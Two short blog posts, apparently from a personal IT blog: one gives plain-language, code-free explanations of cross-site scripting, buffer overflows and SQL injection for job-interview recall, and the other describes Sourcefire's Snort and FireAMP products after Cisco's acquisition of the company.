Relearning Specific Technical Interview Questions!

Something that always gets me (in a bad way) in job interviews are those pointed, very technical questions about something specific.  The two that I am least a fan of are cross-site scripting and buffer overflows.  When I read about either, I understand how they work, but ask me later, and I draw a complete blank.  I need a way to easily remember was each are, and I may just add in SQL injection too!

            What do you say when you’re asked “what is cross-site scripting”?  At its simplest, a cross-site script attack occurs when malicious code is injected into a site that otherwise seems uncompromised and trusted.  The malicious code is sent to another user, which further compromises systems and data.  This is a common web application vulnerability that occurs when code is not reviewed or validated properly.  A browser used to open a website with XSS vulnerabilities does not understand that it is malicious code trying to execute, and will run it anyway. 

            OWASP is a great site for any web application developer looking for ways to prevent cross-site scripting attacks from occurring.  This is an open source (free) resource for guidelines on building secure web applications and ensuring that your site is free from vulnerabilities.

            What are buffer overflow attacks?  Buffers are areas within memory designed to hold a certain amount of input data.  When a problem or error in the code causes this data to leak into adjacent memory areas, a buffer overflow occurs.  Attackers look for these code errors (which can be quite frequent) in order to overflow the buffer and place malicious or too much data into the memory, creating a system crash, errors, or denial of service symptoms. 

            Finally, while I’ve never personally been asked this question, what is SQL Injection?  These attacks, if successful, can be particularly nasty.  SQL injection attacks involve inserting a SQL query in the input field to be used to read or modify database fields.  Data can be tampered with, including changing costs or balances received.  All data may be exposed to unauthorized users, or may be destroyed entirely.  Some programming languages are more susceptible to SQL injection attacks than others but this is one vulnerability that all web developers must check for before going live!

            I’ve learned over the years in my IT career that the less tangible the technology or concept, the more difficulty I have in retaining and recalling information.  Give me a network diagram any day and I can easily visualize the traffic flow and determine what protocols are required and what connections are needed.  But, coding and anything related to software design is out of my league.  I hope that by writing this post that I may recall these 3 common attacks at a later date!

Who Is Sourcefire?

In response to recent news that Cisco Systems has purchased Sourcefire, I thought I would begin by telling you a bit about the latter technology.  Sourcefire is a network security company offering solutions such as Next-Generation firewalls and IPS, as well as malware protection applications.  Probably the most widely known Sourcefire product is their open source IPS, Snort.  Billed as a powerful, effective IDS/IPS, Snort offers the technically savvy administrator hands-on, CLI-interface views into IPS technology.  

Persuant to Snort, Sourcefire offers an enterprise-ready IPS solution.  These appliances protect your network from unauthorized attackers through adaptive rule bases that use awareness and automation calculations to ensure your data is kept free of unwanted malware, attacks and other malicious code.  The appliance monitors your network and analyzed the behavior to keep up to date adjustments on which rules to apply and what traffic to stop from entering your environment.  

Malware is on the rise and companies are looking for ways to prevent infections before they occur.  New technologies, like Sourcefire's FireAMP, show that traffic can be analyzed before a full-blown attack can take place.  The system is metamorphic and can analyze traffic for known malware along with suspicious patterns to defend your perimeter.  FireAMP helps administrators find out where a malware infection began as well as what triggered it.  

Cisco Systems is known for their superb, yet pricey, networking equipment so it comes as no surprise that they would purchase Sourcefire in an attempt to increase their play in the network security market for enterprises.  With a large portions of customers in the networking niche already, Cisco, I assume, hopes to become more involved in protecting the very equipment and infrastructure that they have spent many years perfecting.